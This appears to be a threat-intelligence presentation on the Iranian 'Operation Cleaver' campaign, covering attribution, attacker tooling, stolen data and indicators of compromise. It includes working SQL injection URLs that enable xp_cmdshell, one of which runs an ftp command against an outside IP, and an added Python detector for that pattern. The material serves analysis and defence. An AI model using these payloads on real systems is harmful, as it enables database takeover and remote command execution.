Operation Cleaver
Iran is the next China
Numerous references inside the namespaces of their custom bot code, codenamed TinyZbot, e.g.:
e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb
PDBs associated with the hacker name “Jimbp” e.g.:
c:\users\jimbp\desktop\binder_1 - for cleaver\binder_1\obj\x86\release\setup.pdb
PDBs associated with the keystroke loggers, artifacts, and numerous other tools, e.g.:
e:\Projects\Cleaver\trunk\MainModule\obj\Release\MainModule.pdb
Why “Cleaver”?
The name…
Targeting of critical infrastructure globally.
Shocking level of access.
Network. Systems.
Applications. Databases. DNS. Paypal. GoDaddy.
Basically Everything.
Why Now?
Exposing Cleaver…
• Prior to 2010, Iran as a target was almost non-existent and, as the attacker, was mentioned only in terms of website defacement
• In 2010, Stuxnet was realized, severely impacting Iran’s nuclear program
• Retaliation began…
• Cleaver is an Iranian-born campaign dating to 2012, with some data from 2007
• Since Shamoon, we have witnessed an evolution of skillset and threat actor
IRAN CYBER ATTACKS
Exposing Cleaver…
Sourcing
Iranian
GeoIP Location: Iran
Net block: 78.109.194.96 - 78.109.194.127
Owner: Tarh Andishan
Email: tarh.andishan(at)yahoo.com
Phone: +98-21-22496658
NIC-Handle: TAR1973-RIPE
Tarh Andishan – meaning “Innovators”, “Inventors”
78.109.194.96/27 – Current – Afranet, Iran
217.11.17.96/28 – 10/22/2014 – Afranet, Iran
81.90.144.104/29 – 10/5/2014 – Afranet, Middle East Oil, Iran
31.47.35.0/24 – 11/2012 – Afranet, Iran
The logger module binary’s file description value is the following:
ye file khube DG. ba in ham kari nadashte bashin
Roughly translated from Persian, this text says:
DG is a good file, don’t bother with this
Starting Nmap 6.25 at 2012-08-17 09:18 Iran Daylight Time
Netafraz.com infrastructure in Iran
Persian hacker names: Salman Ghazikhani, Bahman Mohebbi, Kaj, Parviz, Alireza, etc.
IranRedline.org
In one of IranRedLine.org’s blog posts, the author speculates on Tarh Andishan’s involvement with the Iranian government by showing close proximity to SPND, the Organization of Defensive Innovation and Research
Sourcing
Tarh Andishan
TTPs
SQL Injection
http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20show advanced options;declare%20@b2%20varchar(8000);set%20@b2=%20xp_cmdshell;%20EXEC%20master.dbo.sp_configure%20@b1,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20@b2,%201;RECONFIGURE;--%20
http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%2
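The two requests above use stacked T-SQL queries to enable xp_cmdshell through sp_configure and then run a command. As an added defensive example (not code from the original deck), the following Python detector URL-decodes access-log query strings and flags that sequence; the log lines and the 198.51.100.7 address are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original deck): a
# benign request, one that enables xp_cmdshell via sp_configure, and one that
# runs a command through xp_cmdshell.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Aug/2012:09:18:00 +0430] "GET /Demos/demo.cfm?Edit%26ID=111 HTTP/1.1" 200 512
10.0.0.9 - - [17/Aug/2012:09:18:02 +0430] "GET /Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20show%20advanced%20options;EXEC%20master.dbo.sp_configure%20@b1,%201;RECONFIGURE;--%20 HTTP/1.1" 500 0
10.0.0.9 - - [17/Aug/2012:09:18:05 +0430] "GET /Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20ftp%20-A%20198.51.100.7;%20exec%20master..xp_cmdshell%20@b1-- HTTP/1.1" 500 0
"""

REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"(?:GET|POST) (?P<path>\S+) HTTP/')

# Each rule is (tag, regex over the decoded, whitespace-normalised query).
RULES = [
    ("stacked_query", re.compile(r";\s*(declare|set|exec(ute)?)\b", re.I)),
    ("sp_configure", re.compile(r"\bsp_configure\b", re.I)),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("reconfigure", re.compile(r"\breconfigure\b", re.I)),
]


def decode_query(raw: str, rounds: int = 3) -> str:
    """URL-decode until stable (catches double encoding) and squash whitespace."""
    text = raw
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return " ".join(text.split())


def classify(query: str) -> list:
    """Return the tags whose patterns match the decoded query string."""
    decoded = decode_query(query)
    return [tag for tag, rx in RULES if rx.search(decoded)]


def scan_log(text: str) -> list:
    """Return one finding per request whose query string carries stacked T-SQL."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or "?" not in m.group("path"):
            continue
        query = m.group("path").split("?", 1)[1]
        tags = classify(query)
        if "stacked_query" in tags:
            findings.append({"src": m.group("src"), "tags": tags,
                             "query": decode_query(query)})
    return findings
```

A hit on `sp_configure` followed shortly by `xp_cmdshell` from the same source is the sequence worth alerting on; on the database side, leaving xp_cmdshell disabled and running the web application's login without sysadmin rights removes the capability entirely.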
TTPs
Spearphishing: fake resume tool
TTPs
Spearphishing: Resume Submitter
Escalation and Pivoting
Tools and Toys…
Public: Netcat, Cain & Abel, psexec, Mimikatz, WCE, Putty, Plink, nmap, xcmd, etc.
Custom: TinyZbot, NetC, ASPX webshells, SYN flooder, ARP poisoning, Csext, etc.
Exploits: MS08-067 (Conficker) and MS10-015 (KiTrap0D)
• Signing encryption keys for major airline company
• Usernames and passwords from dozens of companies
• 250k Windows credentials at a single Oil company
• Airport and Airline crew credentials
• Airport network configuration files
• SNMP credentials for major Energy Companies
• Student information targeting
Access and Exfil
The damage…
Indicators of Compromise (IOCs)
Let’s go hunting… or preferably PREVENTING!
Domains
Emails for Domain Registration
Emails used for Exfiltration
testmail_00001(at)yahoo.com
TerafficAnalyzer(at)yahoo.com
dyanachear(at)beyondsys.com
IP Addresses
Mutexes
ZSC1
Adobe Report Service
Bmgr
Dynamic Mutexes
demdaramdidam
ILoveThisMutex
Installed Service Names
COM+ System Extentions
COM__System_Extentions
Network Connectivity Manager
Service1
MsNetMonitorPcapins
scManagerSvcCredentialSync
Adobe Report Service
Resources
• “Operation Cleaver” Report
• Cylance Blog
• Twitter: @cylanceinc
• Twitter: @hackingexposed
• Email: [email protected] for more information
• Yara rules on Cylance.com
• Test Drive CylancePROTECT: my.cylance.com